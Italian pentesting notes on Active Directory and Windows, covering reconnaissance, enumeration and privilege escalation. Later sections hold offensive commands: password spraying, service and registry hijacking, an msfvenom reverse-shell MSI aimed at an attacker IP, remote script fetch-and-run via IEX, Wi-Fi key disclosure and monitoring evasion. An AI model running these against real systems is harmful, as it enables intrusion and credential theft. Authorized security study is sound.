Lista che viene aggiornata man mano di metodologie, tool, comandi e CVE inerenti al mondo dell Active Directory:

• Active Directory Pentest:

• Recognition:

  • Passiva
    • Domini
    • Ip
    • Siti Web
  • Attiva
    • Port Scanning
    • Sito Web

• Enumerazione:

  • Enumerazione Esterna
  • Enumerazione Interna
  • Enumerazione host machine
    • Sistema
    • Generali
    • Rete e configurazioni
  • Tools

• Privilege Escalation:

  • Servizi
  • Registri
  • Credenziali
    • Tools
  • Varie
  • Tools

• Lateral movements:

  • Lanciare comandi da remoto
  • Port Forwarding

• Persistence:

  • Gruppi
  • Privilegi
  • Servizi
  • File
  • Registri
  • Varie

• Tools:

  • Metasploit
  • Powerview
  • Bloodhund
  • Mimikatz
  • Impacket
  • Hashcat
    • Creazione di wordlists
  • CrackMapExec
  • Responder
    • Attacchi vari

• DACL attacks:

  • Enumerazione
  • GenericAll
  • WriteDACL
  • WriteProperties
    • Shadow Credentials
    • Targeted Kerberoasting
    • GenericWrite
  • AllExtendedRights
    • AddMembers
    • ForceChangePassword
    • ReadLAPSPassword
    • ReadGMSAPassword
    • DCSync
  • WriteOwner

• Bypass:

  • Bypass UAC
  • Bypass AMSI
  • Bypass Applocker
  • Bypass WDAC
  • Bypass Constrained Language Mode
  • Bypass Logging

• CVE:

  • CVE-2021-42278/CVE-2021-42287
  • CVE-2021-1675/CVE-2021-34527
  • CVE-2022-26923
    • Certificati AD
  • CVE-2023-23397

Sezione dedicata a Windows in cui si va ad approfondire il sistema operativo, protocolli, features di sicurezza, tools lato blueteaming e redteaming

• Windows Internals:

  • Processi di avvio
  • Secure Descriptor
  • Register keys
  • API
  • PE (Portable Executable)
  • Protocolli
    • RPC
    • COM e DCOM
    • LDAP
    • Winrm
    • RDP
    • SMB

• Comandi Powershell:

  • Comandi per i file:
    • Download/Upload file
    • Comandi ADS

• Security:

  • UAC
  • AMSI
  • AppLocker
  • WDAC
  • Constrained Language Mode
  • Note Security

• Suite SysInternals:

  • File e dischi
  • Rete
  • Processi
  • Sicurezza
  • Informazioni di sistema
  • Generali

• Forense:

  • FAT e NTFS
  • Registri
  • File
  • Applicazioni
  • Log
  • Device Esterni
  • Tools

• Shellcode:

  • Tecniche di Injection
  • Tecniche di esfiltrazione
  • Decompiling e Debugging

• Link a risorse esterne

Sezione dei credits per i riconoscimenti:

Credits

Questa repository nasce come un luogo dove appuntarsi materiale e crearsi un proprio worfkflow è quindi normale che vi possano essere degli errori di qualsiasi genere al proprio interno.

Nell'intera repository troviamo la presenza di molto codice scritto in molteplici linguaggi e può capitare che nel tempo alcuni comandi o librerie diventino deprecate, inoltre è possibile che vi siano dei passaggi errati all'interno delle varie sezioni, ogni comando è stato sempre prima testato ma i fattori che possano influenzare l'esito sono molteplici è quindi bene utilizzare anche internet per informarsi.

La repository può contenere errori ortografici o di sintassi.

Si consiglia di utilizzare questa repository come una fonte di ricerca rapida (CTRL + F e cercare per parole chiave) casomai non si trova quello che si cerca, approfondire con internet

La fase di recognition è una se non la fase più importante, la quale determina con quale approccio poi potersi interfacciare con il target, in questa sezione vogliamo dare un'infarinatura generale cercando di non sfociare troppo nell'OSINT (Open Source Intelligence) ma piuttosto poter trovare il nostro foothold

La fase di recognition passiva consiste nell'utilizzare fonti aperte e siti esterni che aiutino nella ricerca di informazioni più utili possibili del target, senza doverci interagire

Enumerare un dominio è il primo passo, stiamo parlando della prima connessione che abbiamo con il nostro target ed iniziare a capire in che modo è strutturato può rivelarsi molto utile

• DnsDumpster:

DnsDumpster sito molto completo per l'enumerazione di subdomains, può essere maggiormente integrato con il sito viewDNS che dispone di informazioni ulteriori da poter vedere

• Crt.sh:

crt.sh, sito per controllare i certificati, dove possiamo scoprire eventuali subdomains e relativi Ip

• CriminalIp

Criminalip, sito utile per carpire informazioni sulla sicurezza e affidabilità del sito target come: JS obfuscato, sito di Phising e altre informazioni importanti

Dalla ricerca dei domini possiamo passare ad una ricerca più granulare con eventuali indirizzi IP trovati

• Shodan, Censys e Zoomeye:

Una volta trovati indirizzi IP possiamo scannerizzarli con i tre siti Shodan, Censys e Zoomeye

N.B: Vengono mostrate 3 opzioni in quanto un possibile target potrebbe pagare uno dei siti per non essere indicizzato

• G-suite tools e Traceroute Online:

I due siti G-suite tools e Traceroute Online utilizzati insieme offrono ping e traceroute mappati

• Check-Host:

Il sito Check-Host può essere utilizzato per capire da quale paese sono bloccati gli ip, quindi capire da dove poter utilizzare un eventuale VPN o Proxychain

Nella quasi totalità dei casi ci sarà un sito web d'analizzare quindi:

• Netcraft:

Netcraft verrà utilizzato come primo strumento per avere un'idea del sito web stesso

• Wayback Machine:

Wayback Machine può ritornaci molto utile per vedere lo storico del sito target e come è evoluto

• XML-Sitemaps:

Il sito XML-Sitemaps permette di fare un crawling delle varie subdirectory e in un secondo momento visionare i risultati sul sito o in un file

• Buckets.GrayHatWarfare:

Buckets.GrayHatWarfare dà la possibilità di controllare la presenza di file lasciati in giro provenienti da container aperti in cloud (AWS, Google Cloud e Azure)

• Proxyium: Andremo ad interagire con il sito web ma sempre in maniera anonima grazie al sito Proxyium, infatti prima inseriremo l'URL del target all'interno di Proxyium il quale farà da proxychain, una volta all'interno possiamo navigare all'interno del sito e analizzare le tecnologie utilizzate grazie all'estensione Wappalyzer

N.B: utilizzare proxyium solo per la fase di recon in quanto sicuramente ogni nostra azione sarà registrata

• Hunter.io e Email Extractor:

i siti Hunter.io, skymem e l'estensione Email Extractor permettono uno scraping delle email all'interno del sito per poi poterle utilizzare in altre fasi del PT

N.B: Hunter.io ci si deve registrare e permette un numero limitato di ricerche ma è molto più performante di Email Extractor mentre skymem permette di visionare un numero limitato di email ma in maniera totalmente gratuita

• search.0t.rocks:

Una volta trovate email o informazioni personali di un utente possiamo approfondire la ricerca con il sito search.0t.rocks che contiene i records da vari database

Vi è la possibilità di automatizzare alcune delle ricerche passive con un mio script python in selenium, lo si trova al seguente link

La fase di recognition attiva ci obbliga ad interagire con il target per approfondire la nostra ricerca

La fase di port scanning consiste nell'iniziare a conoscere quali porte siano aperte e che cosa vi giri dietro

• Nmap:

La nostra prima superficie di attacco sono le porte quindi il primo passo da compiere è capire quali servizi girino dietro esse

Comandi:

N.B: le combinazioni possibili delle flag che mette a disposizione nmap sono molteplici quindi non tutte potranno essere presente

nmap -sC -sV -p- <ip> #comando per fare lo scanning di tutte le porte di un determinato ip con l'aggiunta delle flag -sC (standard script) e -sV (standard version) aumentano l'efficacia di raccolta informazioni

Questo link è utile per guardare i servizi e le porte di default che possono essere aperti su active directory e in ambiente windows

1. Detection ed evasion dei sistemi di sicurezza:

Molte volte l'azienda target in sua difesa può ricorrere a sistemi quali: firewall, IDS e ecc... sapere come detectarli e trovare una qualche maniera di bypassarli è un passo fondamentale

N.B: le tecniche di detection ed evasion sono molteplici e non è possibile inserirle tutte

Detection:

Evasion:

2. Scripting nmap:

Feature utile del tool è lo script engine che mette a disposizione una lista di script visitabile qui

3. nmap + searchsploit:

Nmap può essere utilizzato insieme a searchsploit (CLI di exploitdb) tramite la creazione di un xml output delle porte scansionate nel quale in seguito possiamo vedere di quali possibili CVE sono vulnerabili

nmap -sV <ip> -p <porta n1 target>,<porta n2 tarrget>,<ecc> -oX <nome file>.out #comando per generare un file xml di output con le porte scansionate

searchsploit --nmap <nome file output>.out #comando per combinare il file xml con searchsploit 

• Rustscan:

Rustcan è un'alternativa a Nmap scritta in Rust perciò estremamente veloce e facile da usare, può essere anche configurato per lavorare insieme ad Nmap

Comandi:

rustscan -a <ip> -- -sC -sV #comando per avviare rustscan con poi l'utilizzo di nmap

1. Sub-Domain Enumeration:

Quando abbiamo davanti un webserver è importante conoscere tutti i domini e host virtuali; capita infatti che gli amministratori dei server lascino un sottodominio da cui amministrano il webserver

• Wfuzz: Wfuzz permette di 'FUZZARE' i subdoamins attraverso liste che possiamo trovare su github come la Seclists

wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://<ip>/ -H "Host:FUZZ.<subdomain 1>.<top level domain>" --hl <numero di linee da filtrare>

N.B: Consigliamo prima di avviare wfuzz senza la flag -h (hide) perchè va capito cosa nascondere dall'output del comando

2. Directory Enumeration: Per avere una visione di insieme del webserver è importante conoscere tutte le rotte e le pagine del sito così da enumerarle e cercare eventuali vulnerabilità

• FeroxBuster:

FeroxBuster è tool scritto in Rust estremamente veloce e completo con cui potremo fuzzare i webserver utilizzando wordlists

Con il seguente scan avviamo un'enumerazione recursiva delle directory del webserver ed inoltre andremo ad affinare la ricerca aggiungendo la ricerca delle estensioni con la flag '-x' (Ovviamente possono essere ridotte per incrementare la velocità dello scan sacrificando l'accuratezza)

feroxbuster -u http://<sitoweb>/ -w /usr/share/wordlists/webpageenum.txt -x php,txt,bak,py,js,html,pdf,git,zip,7z,docx,old,sh -t <num thread> -d <num di profondità> #comando per avviare feroxbuster

• Indicazione Generali:

Scrivere in maniera completa della fase attiva contro un sito web è impossibile perchè i footholds e le metodologie sono molteplici, i consigli generali per muoversi possono essere:

1. Controllare i vari campi di input e provare gli attacchi più noti

2. Utilizzare Burpsuite per vedere come il server elabora le richieste

3. Controllare la versione delle tecnologie utilizzate dal sito per possibili exploit

4. Visionare il sito, utilizzarlo e comprendere il suo reale utilizzo

5. Google è nostro amico per qualsiasi dubbio va utilizzato

La pratica di enumerare è una tra le più importanti, in quanto permette di ricavare informazioni vitali sul target e permette di progettare i prossimi movimenti; prima di entrare però si ha la necessità di enumerare dall'esterno e vi sono vari metodi

Viene di seguito presentata una lista di enumerazione del DC target con diversi tool

• Enum4linux-ng:

git clone https://github.com/cddmp/enum4linux-ng.git
pip3 install -r requirements.txt #comandi per impostare il tool

python3 enum4linux-ng.py <ip> #comando per enumerazione senza credenziali

python3 enum4linux-ng.py <ip> -u <utente> -p <password> #comando per enumerazione con credenziali

• SMB enumerazione e comandi:

Teoria di SMB

smbmap -u <utente> -p <password> -H <ip> -R -d <numero profondità per la recursività> #comando per enumerare gli shares in maniera recursiva ed inoltre vedere quali permessi abbiamo su di essi

smbclient -L \\\\<ip>\\ #comando per listare gli shares

smbclient \\\\<ip>\\<shares> -U <user> #comando per entrare nello share e poi inserire la password

smbget -R smb://<indirizzo ip>/<share>/ #comando che fa il download in maniera recursiva

• Enumerazione utenti:

1. Crackmapexec, solo se abbiamo l'accesso a IPC$ all'interno del servizio SMB, avere un utente con credenziali valide e o anonymous login:

crackmapexec smb <nome dominio o ip> -u '<nome utente>' -p '' --rid-brute

2. Kerbrute, tramite una lista di user possiamo vedere quali sono presenti nell'AD target:

kerbrute userenum -d <nome dominio> --dc <ip del domain controller> <wordlist>

• Enumerazione RPC:

L'enumerazione del RPC permette di recuperare informazioni importanti come utenti, gruppi, shares; sempre se disponibile anonymous login o credenziali valide

Esistono due tool utili per l'enumerazione il primo è rpcclient:

Comandi:

rpcclient -U "" -N <ip> #comando che si connette tramite anonymous login

rpcclient -U "<utente>%<password>" -N <ip> #comando che si connette tramite credenziali

enumdomusers #comando per enumerare tutti gli utenti

enumdomgroups #comando per listare i gruppi

queryuser 0x<numero rid in esadecimale> #comando per ottenere maggiori informazioni su un utente

queryusergroups 0x<numero rid in esadecimale> #comando per ottenere maggiori informazioni sui gruppi degli utenti

querygroup 0x<numero rid in esadecimale> #comando per ottenere maggiori informazioni di un gruppo

querygroupmem 0x<numero rid in esadecimale> #comando per ottenere maggiori sui membri di un gruppo

netshareenumall #comando per enumerare gli shares

N.B: Sono solo alcuni dei comandi disponibili per l'enumerazione

Il secondo è rpcdump.py della suite Impacket che permette di dumpare tutti i processi della macchina target

Comandi:

rpcdump.py -port 135 <ip> #comando che dumpa i processi 

• Enumerazione LDAP:

Teoria sul LDAP

Comandi:

nmap -n -sV --script "ldap* and not brute" <ip> #comando che tramite anonymous login tenta il recupero di informazioni

ldapsearch -x -H ldap://<ip> -D '<dominio>\<username>' -w '<password>' -b "DC=<primo sottodominio>,DC=<top level domain>" #comando che verifica se le credenziali sono giuste

windapsearch script in go che velocizza l'enumerazione di utenti, gruppi, computers, gpos e ecc... Un'enumerazione completa richiede credenziali valide

git clone https://github.com/ropnop/go-windapsearch.git && cd go-windapsearch
go install github.com/magefile/mage
sudo cp /home/<nome utente>/go/bin /usr/bin #vi è pure la possibilità di aggiungere nella $PATH la cartella /go/bin senza copiare il binario
mage build
sudo cp ./windapsearch /usr/bin #comandi per installare e preparare lo script windapsearch

windapsearch -m <modulo> --dc <nome dominio> -u "<nome utente>" -p "<password>" #comando generale per far funzionare windapsearch

windapsearch -m <modulo> --dc <nome dominio> -u "" -p "" #comando che utilizza anonymous login

windapsearch -m users --dc <nome dominio> -u "<nome utente>" -p "<password>" #comando per enumerare gli utenti

windapsearch -m groups --dc <nome dominio> -u "<nome utente>" -p "<password>" #comando per enumerare i gruppi

windapsearch -m computers --dc <nome dominio> -u "<nome utente>" -p "<password>" #comando per dumpare i gruppi #comando per enumerare i computer

ldapdomaidump, script che se abbiamo le giuste credenziali dumpa molte informazioni come: utenti, gruppi, computer e ecc...

ldapdomaindump <ip> -u '<dominio>\<nome utente>' -p '<password>' --no-json --no-grep -o <dir dove salvare output> #comando che avvia ldapdomaindump

N.B: Ovvio che lo script windapsearch dispone di altri moduli per l'enumerazione

• Metodi di connessione remota alla target machine:

Vengono di seguito riportati le metodologie per connettersi alle target machine

1. winrm:

evil-winrm -i <nome dominio> -u <nome utente> -H <hash NTLM> o -p <password> #utilizziamo il WinRM protocol per connettersi

upload <path file locale della nostra macchina> <nome di come salvarlo> #comando per uplodare dalla kali alla target machine il file tramite evil-winrm

download <path file da dove dove scaricare> <path file destinazione nella nostra macchina> #comando per il download del file dalla target machine alla kali tramite evil-winrm

2. rdp:

rdesktop -u <nome utente> -p <password> <ip> #comando per connettersi con RDP

xfreerdp /v:<ip> /u:<user> /p:<password> /dynamic-resolution /drive:<nome share>,<nome path locale> #comando per connettersi con RDP

• Kerberos double hop problem:

Il kerberos double hop problem consiste che utilizzando powershell/winrm per effettuare l'accesso non stiamo utilizzando delle credenziali che rimarranno in memoria sulla macchina dove vogliamo connetterci (Quindi permettono di autenticarci verso altri servizi o macchine) ma i kerberos ticket i quali danno accesso ad un servizio specifico (esempio una macchina)

ES:

Utilizzo credenziali NTLM:

Utilizzo TGT/TGS:

Soluzioni:

1. PSCredential Object:

Creazione di un PSCredential Object da inviare per autenticarsi

Comandi:

$Password = ConvertTo-SecureString '<password user target>' -AsPlainText -Force #comando che crea una variabile contenente la password

$Credenziali = New-Object System.Management.Automation.PSCredential('dominio\utente', $Password) #comando che crea una variabile contenente l'oggetto PSCredential da passare per autenticarsi

Get-DomainUser -spn -credential $Credenziali #comando del tool powerview che passandogli le credenziali permette di autenticarci verso il DC ed enumerarlo

• Autenticazioni:

RunAs.exe:

Una volta riusciti ad ottenere delle credenziali valide è tempo di entrare nel sistema e iniziare l'enumerazione interna però è anche vero che prima va capito dove poter utilizzare queste credenziali un metodo può essere "RunAs.exe" il quale è un binario di windows che permette di eseguire uno script o un programma con credenziali di altri utenti

Comandi:

runas.exe /netonly /user:<dominio>\<nome utente> cmd.exe #comando che date delle credenziali le utilizza per aprire un CMD
/netonly #flag del comando runas che indica di utilizzare le credenziali per l'autenticazione di rete, infatti le credenziali che inseriamo verranno prese per buone, in quanto non verificate dal domain controller ma semplicemente caricate in memoria

Capita che, quando si utilizzano connessioni tramite WinRM o shell ottenute con Meterpreter, si possa avere la necessità di utilizzare "RunAs.exe" per accedere con altri utenti. Tuttavia, le due metodologie di connessione menzionate in precedenza non permettono il prompt della password da linea di comando (CLI) per risolvere questo problema possiamo utilizzare RunaCs, script in C# che permette di inserire la password da CLI

• Enumerazione della rete con nmap:

Una volta all'interno avere una visione sulla rete target è fondamentale

nmap -sn -Pn <ip>/<num bit dedicati alla rete> #comando per fare lo scanning della subnet, senza pingarle e enumerare le porte

nmap -Pn <ip>/<num bit dedicati alla rete> #comando per fare lo scanning della subnet

nmap -Pn <ip> -n --disable-arp-ping -PE --reason #comando per enumerare un solo host, la flag PE indica ICMP echo requests, il -n disattiva la risoluzione DNS

• Enumerazione della rete con powershell e cmd:

Vi è la possibilità di enumerare una rete anche tramite comandi powershell e cmd

Comandi:

for /L %i in (1 1 254) do ping <ip subnet>.%i -n 1 -w 100 | find "Reply" #comando cmd che data una subnet enumera tramite ping

1..254 | % {"<ip subnet>.$($_): $(Test-Connection -count 1 -comp <ip subnet>.$($_) -quiet)"} #comando powershell che data una subnet enumera tramite ping

N.B: prestare attenzione ai bits dedicati agli hosts in questo caso abbiamo ipotizzato che fossero 8 quindi da 1 a 254

• Enumerazione SYSVOL:

Un buon metodo per verificare che le credenziali inserite nella fase di autenticazione siano valide è tramite l'enumerazione di SYSVOL, che anche l'utente con meno privilegi può listare; SYSVOL è una cartella presente in tutti i domain controller è importante perchè contiene dati e informazioni importanti per la replicazione di quest'ultimi tra domain controllers

Comandi:

dir \\<nome dominio o ip>\SYSVOL\ #comando per listare la directory SYSVOL

N.B: Vi è una differenza tra listare con il nome dominio o con l'indirizzo IP, utilizzando l'hostname verrà eseguito il kerberos authentication mentre con l'indirizzo IP verrà utilizzato NTLM.

• Enumerazione tramite MMC e RSAT:

Nel MMC (Microsoft Management Console) possiamo trovare al suo interno degli snap-in di provenienti da "RSAT (Remote Server Administration Tools)", una suite di tools per amministrare da remoto un'active directory

N.B: Questo tipo di enumerazione richiede di avere accesso ad una GUI quindi una connessione RDP ma come sappiamo non sempre è possibile

Comandi:

start-> App e Funzionalità-> aggiungi una funzionalità-> RSAT-> installa #passi per installare RSAT

Avendo installato RSAT avremo ora disponibili in MMC degli snap-in per il controllo dell'AD

mmc-> File-> Aggiungi/rimuovi snap-in-> aggiungiamo i 3 snap-in quali: Domini e trust di Active Directory, Siti e servizi di Active Directory infine Utenti e computer di Active Directory-> ai primi 2 snap-in va cambiato la forest con il dominio target, al terzo snap-in va cambiato il dominio con il dominio target #passi per installare e configurare gli snap-in 

Ora che gli snap-in sono pronti non ci resta che dare uno sguardo all'AD

Utenti e computer di Active Directory-> dominio target-> si apriranno diverse cartelle dove possiamo vedere per esempio chi appartiene al dominio, le macchine a dominio ecc... #passi per visionare l'interno dell'AD tramite lo snap-in

N.B: se nella target machine non abbiamo disponibile RSAT, possiamo sfruttare un trick cioè in una vm locale, installare RSAT per poi andare alla seguente path "C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.ActiveDirectory.Management" copiare la dll del RSAT e importarla nella target machine infine ad ogni commando basterà aggiungere la flag -Server

• Enumerazione tramite Powershell:

Powershell permette di ampliare le nostre capacità di enumerazione perchè dispone di cmdlets più potenti e che permettono la scrittura di comandi ancora più complessi tipo lo script PowerView

Comandi:

Get-Module #comando per recuperare i moduli importati

Get-ADUser -Filter * | fl * #comando per listare tutti gli utenti e avere maggiore informazioni di output

Get-ADUser -Identity <SAM nome> -Server <hostname> -Properties * #comando per enumerare uno specifico utente con tutte le sue proprietà

Get-ADGroup -Filter * | fl * #comando per enumerare i gruppi e avere maggiore output di informazioni

Get-ADGroup -Identity <nome gruppo> -Server <hostname> #comando per enumerare un gruppo specifico

Get-ADGroupMember -Identity <nome gruppo> -Server <hostname> #comando per enumerare i membri di un gruppo specifico

Get-ADObject -Filter 'badPwdCount -gt 0' -Server <hostname> #comando che cerca tra gli ADObject account che hanno più di un tentativo fallito di accesso

Get-ADDomain -Server <hostname> #comando che recupera maggiori informazioni sul dominio

Get-ADTrust -Filter * #comando che recupera la fiducia tra domini o tra domini di altre forest

Get-ADDomain #comando per prendere tutte le informazione dell'AD Domain

Get-NetIPAddress #comando powershell per ottenere la configurazione di rete

Get-MpComputerStatus #comando per vedere info su microsoft defender

Get-HotFix | ft -AutoSize #comando che mostra cosa è stato aggiornato e quando

Get-ComputerInfo #comando che prende informazioni della macchina

Get-Localuser #comando che lista gli utenti locali nella macchina

Get-LocalGroup #comando che lista i gruppi locali nella macchina

Get-ScheduledTask #comando che lista tutti gli schedules

Get-Acl #comando per listare le access-list dei permessi

Get-PSDrive #comando che lista i drive dell'ambiente legati a powershell che possono essere variabili, oggetti, registri e volumi.

Get-ChildItem -Path C:\Users\* -Include *.vhdx, *.vhd, *.vmdk, *.OVF, *.OVA, *.VDI -Recurse -ErrorAction SilentlyContinue #comando per listare eventuali virtual disks nel sistema

IEX(iwr 'https://gist.githubusercontent.com/egre55/816ddb91016034dcf747f4ea5f054767/raw/5ef623d3697af04dea7badcf96074c2494578ffe/procmon.ps1') | fl * #comando che fa una richiesta web di un piccolo script che agisce come procomon tramite IEX lo esegue subito in memoria, fl è per ricevere più output

• Spraying:

Lo spraying tradotto in spruzzare è una tecnica di accesso che a seconda delle informazioni in nostro possesso (un nome utente valido e una lista di password | una lista di utenti e una password valida | una lista di utenti e una lista di password) tentiamo accessi ripetuti su molteplici utenti

N.B: Questa tecnica va utilizzata con parsimonia in quanto: è molto rumorosa, potremmo bloccare account validi per i troppi tentati accessi

_I primi passi sono quelli di recupero di nomi utenti (tramite ldapsearch, CrackMapExec, kerbrute e ecc...), recupero di password policy (tramite i comandi "net" o il tool CrackMapExec...) e creazioni di wordlists.:

:Una volta ottenuto tutto il necessario è possibile eseguire la tecnica di spraying con tool come CrackMapExec (i comandi sono spiegati nella sezione relativa) o con lo script DomainPasswordSpray se abbiamo accesso ad una macchina windows_

Comandi DomainPasswordSpray:

Import-Module .\DomainPasswordSpray.ps1 #comando per importare il modulo .ps1

Get-DomainUserList -Domain <nome dominio> -RemoveDisabled -RemovePotentialLockouts | Out-File -Encoding ascii <nome file output> #comando dello script che genera una wordlist di utenti

Invoke-DomainPasswordSpray -UserList <nome file lista di users> -Domain-name <nome dominio> -PasswordList <nome file lista di password> -ErrorAction SilentlyContinue #comando per eseguire lo spraying su una lista di user con una lista di password

N.B: dello script "DomainPasswordSpray" ci sono altre flag da poter utilizzare è bene visionare l'help dei comandi

Un passo importante oltre all'enumerazione esterna e interna è ricavare informazioni dalle varie host machine su cui uno ottiene l'accesso

tasklist /svc #comando per listare i servizi

set #comando CMD per listare le variabili d'ambiente

systeminfo #comando per listare informazioni sul PC, nello specifico anche quando sono stati fatti vari aggiornamenti

wmic product get name /format:List #comando CMD per listare i programmi installati

wmic qfe get Caption,Description,HotFixID,InstalledOn /format:List #comando per vedere hotfix del sistema e quando sono stati effettuati

wmic computersystem get Name,Domain,Manufacturer,Model,Username,Roles /format:List #comando che recupera informazioni sul pc 

wmic ntdomain list /format:list #comando per recuperare informazioni sui domini

vssadmin list shadows #comando per listare le shadowcopies

query user #comando che lista gli utenti attivi tramite RDP

qwinsta #comando per controllare se altri utenti sono connessi

qwinsta /server:<nome o indirizzo ip> #comando per controllare se altri utenti sono connessi ma ad un server in remoto

cipher /u /n /h #comando per listare EF (Encrypted file)

whoami /all #comando che ottiene tutte le informazioni come privilegi e gruppo

net user #comando che lista tutti gli utenti locali

net user <nome utente> /add #comando per aggiungere un utente alla macchina 

net user <nome utente> #comando per ricavare più informazioni su un utente specifico

net user /domain #comando per listare tutti gli utenti nel dominio

net user <nome utente> /domain #comando per ricavare più informazioni sull'utente specificato nel dominio

net user <nome utente> /add /domain #comando per aggiungere un utente a dominio

net localgroup #comando che lista tutti i gruppi locali

net localgroup <nome gruppo> #comando che dato un gruppo ci fornisce ulteriori informazioni

net localgroup <nome gruppo> <nome utente> /add #comando per aggiungere un utente ad un gruppo locale

net group #comando per listare i gruppi nel dominio

net group <nome gruppo> #comando per listare i membri di un gruppo specificato

net group <nome gruppo> <nome utente> /add #comando per aggiungere un utente ad un gruppo nel dominio

net share #comando che recupera informazioni sugli shares

net use \\<nome del server>\<nome dello share> /user:<nome utente e password> #comando per accedere e visionare uno share di SMB se disponibile

net use \\<ip>\ipc$ "" /u:"" #comando che tenta l'autenticazione tramite la null session di SMB

net accounts #comando che lista le password policy in locale

net accounts /domain #comando che lista le password policy a dominio

findstr /I /S /M "<parola da ricercare>" *.<estensione file> #comando per ricercare una specifica parola nei file indicati da noi

dir -Path C:\ -Recurse -Filter "<nome file>" -File #comando per ricercare uno specifico file

cmd /c dir /q '<path cartella>' #comando per listare il proprietario di una determinata cartella

N.B: Piccolo consiglio i comandi con l'utility "net" potrebbero essere monitorati è possibile usarli comunque scrivendo con il comando "net1"

ipconfig /all #comando per listare le configurazioni di rete

arp -a #comando per listare ARP table

route print #comando per listare le routing table

netstat -ano #comando per listare connessioni attive e porte in ascolto

netsh wlan show profile #comando per listare le interfacce wlan

netsh wlan show profile <nome interfaccia> key=clear #comando per mostrare la password in chiaro

netsh advfirewall show currentprofile #comando per listare il profilo corrente del firewall

netsh advfirewall show allprofiles state #comando che mostra tutti i profili

netsh advfirewall firewall show rule name=all #comando che lista tutte le regole del firewall

netsh trace start capture=yes report=disabled
netsh trace stop #comandi per avviare e poi quando vogliamo stoppare lo sniffing della rete

I pacchetti catturati con netsh sono salvati con estensione ".etl" ma possono essere converiti in .pcap con il seguente tool

etl2pcapng.exe <file>.etl <path file dove salvarlo> #comando per convertire il .etl in .pcap

Esistono dei tool per automatizzare il processo:

• Bloodhund link diretto alla sezione apposita
• PowerView link diretto alla sezione apposita

Metodi per scalare i propri privilegi in windows

• Abusare permessi insicuri nei servizi:

Per controllare le misconfiguration utilizzeremo accesschk.exe (utility che serve a controllare i permessi ACL su oggetti di sistma Windows) è contenuto nella suite di sysmon scaricabile dal seguente link:

accesschk.exe /accepteula -uwcqv <nome utente> <nome servizio> #restituisce i permessi dell'utente relativi al servizio ricercato

se l'utente ha il seguente privilegio "SERVICE_CHANGE_CONFIG" può essere vettore di privilege escalation:

facciamo una query al servizio per controllare che giri come SYSTEM (o LocalSystem) sotto la voce "SERVICE_START_NAME"

sc qc <nome servizio> #fa una query al servizio per ottenere i suoi dettagli

a questo punto possiamo sostituire il binario puntato dal servizio con uno creato da noi per farlo eseguire al riavvio:

sc config <nome servizio> binpath= "\"<path al nostro eseguibile>\"" #indichiamo la path con gli apici attraverso l'escape character

net start <service> #avviando il servizio verrà lanciato il nostro eseguibile come amministratore

• abusare di path non racchiuse da doppi apici:

se la path di un servizio è scritta nel seguente modo:

BINARY_PATH_NAME: <Path al servizio>\<directory>\.. #quindi non racchiusa dalle virgolette 

può essere vettore di privilege escalation perchè senza doppie virgolette la path viene letta male dal sistema e con gli spazi che vengono interpretati come dei break, windows proverà ad eseguire un qualcosa prima di ogni spazio

ES: C:\Windows\Tasks\rev.exe

C:\rev.exe

C:\Windows\rev.exe

C:\windows\Tasks\rev.exe

possiamo di conseguenza inserire un eseguibile (sempre se si hanno i permessi di write sui servizi e sulla directory da modificare).

copy <Path del nostro eseguibile> "<path del servizio>\<nome eseguibile>.exe" #così facendo il sistema cercherà la path e arrivato allo spazio eseguirà il nostro comando prendendo i dati successivi come argomenti dell'eseguibile

net start <nome servizio> #comando per startare un servizio

• Abusare di eccessivi permessi di modifica delle chiavi di registro:

sc qc <nome servizio> #comando che fa una query al servizio

accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\<nome servizio> #comando che controlla i permessi e chi ha accesso alle chiavi di un servizio di registro

"NT AUTHORITY\INTERACTIVE" se le chiavi sono accessibili da questo gruppo significa che tutti gli utenti con logon possono modificarle:

reg add HKLM\SYSTEM\CurrentControlSet\services\<nome_servizio> /v <ImagePath> /t REG_EXPAND_SZ /d <path nostro eseguibile> /f #comando che aggiunge una chiave di registro

net start <nome servizio> #comando che starta un servizio

• Abusare permessi di scrittura sugli eseguibili dei servizi:

sc qc <nome_servizio> #comando che fa una query al servizio

C:\PrivEsc\accesschk.exe /accepteula -quvw "<path servizio>" #comando che fa una query sui permessi di sicurezza di un servizio

Notiamo che il "BINARY PATH NAME" è scrivibile da tutti

copy <nostro_eseguibile> <path binario del servizio> #se abbiamo permessi di scrittura sull'eseguibile del servizio possiamo sostituirlo con il nostro 

La spiegazione di cosa sono e di quali sono i registri si trova qui

• Abusare degli autorun attraverso le chiavi di registro:

reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run #interroga i registri per cercare eseguibili con autorun

accesschk.exe /accepteula -wvu "<path dell'eseguibile>" #ricerca le proprietà degli eseguibili che sono autorun

se l'eseguibile è word-writable possiamo sostituirlo con il nostro e riavviare la macchina:

copy <nostro_eseguibile_da_runnare> "<path autorun>" /Y #dopo il riavvio si attiverà automaticamente

• Abusare dei privilegi di installazione come amministratore (permettono di installare sempre un programma come amministratore)

Andremo a controllare tramite la reg query se AlwaysInstallElevated è settato a 1 o 0, AlwaysInstallElevated controlla la richiesta di elevazione dei privilegi del MSI installer, se settato a 0 l'installer richiede di elevare i privilegi solo quando serve invece se ad 1 l'installer lo richiede sempre cosi facendo può essere vettore di privilege escalation.

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated #interroga le chiavi di registro
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated #se sono settate su 0x1 sono attive

possiamo creare un installer con msfvenom per richiamare una revshell da amministratore quando installato:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<ip_attaccante> LPORT=<porta_attaccante> -f msi -o <nome file>.msi #comando per generare il .msi malevolo

msfconsole -q -x "use multi/handler; set payload windows/x64/shell_reverse_tcp; set lhost <ip>; set lport <porta>; exploit" #comando per preparare il listener

msiexec /q /i http://<ip>/<nome file malevolo>.msi
msiexec /i <path al file .msi> /quiet /qn /norestart #comandi per eseguire il file .msi

N.B: Capita che alcuni utenti non abbiamo gli IL necessari è consigliato di utilizzare allora RunAs e una shell che possa permettere il prompt delle password

• AutoLogon:

L'autologon è un'impostazione che permette ad un utente di poter fare l'accesso senza dover richiedere di inserire manualmente nome utente e password, il tutto funziona con due chiavi di registro la prima "DefaultUserName" e la seconda "DefaultPassword"

